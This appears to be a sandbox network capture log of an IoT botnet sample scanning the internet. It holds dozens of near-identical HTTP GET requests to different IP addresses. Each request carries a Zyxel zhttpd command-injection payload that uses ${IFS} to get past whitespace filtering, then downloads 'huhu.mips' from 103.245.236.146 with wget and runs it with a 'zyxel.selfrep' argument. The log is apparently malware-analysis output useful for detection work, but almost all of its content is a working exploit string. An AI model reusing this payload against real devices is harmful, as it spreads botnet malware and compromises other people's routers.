                                                Jan 29, 2024 07:08:08.749933958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9458192.168.2.2358260168.117.56.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749978065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9459192.168.2.2343280160.100.198.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750020027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9460192.168.2.2349096154.213.153.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750053883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9461192.168.2.2337704121.172.142.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750089884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9462192.168.2.2346508153.99.80.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750127077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9463192.168.2.2335298186.249.37.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750158072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9464192.168.2.2334774204.5.24.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750188112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9465192.168.2.2334616193.206.18.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750241041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9466192.168.2.2336566158.86.68.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750276089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9467192.168.2.2356766119.3.155.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750279903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9468192.168.2.2346518195.17.219.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750344038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9469192.168.2.2335466158.9.124.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750391960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9470192.168.2.2353006192.13.188.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750431061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9471192.168.2.2339092185.113.146.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750458002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9472192.168.2.2358828170.111.184.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750497103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9473192.168.2.23465885.12.202.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750524044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9474192.168.2.2355332204.163.15.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750545979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9475192.168.2.2344446208.7.85.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750580072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9476192.168.2.2360156150.222.143.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750607967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9477192.168.2.234198876.197.245.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750648975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9478192.168.2.2354184102.87.163.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750684977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9479192.168.2.2343910171.216.40.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750718117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9480192.168.2.2333970111.28.70.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750766039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9481192.168.2.2340862176.35.8.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750809908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9482192.168.2.2357400115.92.221.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750857115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9483192.168.2.2340194116.247.8.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750896931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9484192.168.2.233750836.57.8.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750948906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9485192.168.2.2337416180.55.32.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.750976086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9486192.168.2.233993039.128.190.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751013994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9487192.168.2.2346508212.50.109.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751080990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9488192.168.2.2334628182.24.210.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751099110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9489192.168.2.2347974132.4.53.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751130104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9490192.168.2.233552454.158.187.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751178980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9491192.168.2.2352772145.13.135.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751220942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9492192.168.2.2357982104.129.231.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751255989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9493192.168.2.234227495.83.179.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751282930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9494192.168.2.234245062.243.176.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751307011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9495192.168.2.2338468171.122.35.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751370907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9496192.168.2.233423844.210.240.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751390934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9497192.168.2.2344638174.242.190.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751465082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9498192.168.2.2352230160.105.107.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751492977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9499192.168.2.2334512125.131.29.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751557112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9500192.168.2.2333324200.175.246.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751585960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9501192.168.2.2353388160.165.93.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751638889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9502192.168.2.234266495.203.241.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751669884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9503192.168.2.233304231.233.197.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751728058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9504192.168.2.2353758185.97.216.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751770020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9505192.168.2.2360362137.116.242.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751821995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9506192.168.2.234679866.71.198.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751849890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9507192.168.2.235155884.67.219.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751868963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9508192.168.2.23382301.244.26.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751920938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9509192.168.2.2359200156.208.81.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.751966953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9510192.168.2.234200824.196.173.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752003908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9511192.168.2.2352970142.151.230.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752067089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9512192.168.2.235531296.52.119.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752079010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9513192.168.2.2354412205.192.16.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752103090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9514192.168.2.234039684.75.214.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752152920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9515192.168.2.235378498.137.57.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752176046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9516192.168.2.235892657.128.185.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752223969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9517192.168.2.2355200144.21.95.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752270937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9518192.168.2.235994040.12.197.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752315998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9519192.168.2.2332938217.205.181.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752363920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9520192.168.2.234986078.209.65.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.752418041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9521192.168.2.2338418119.200.194.221443
                                                TimestampBytes transferredDirectionData
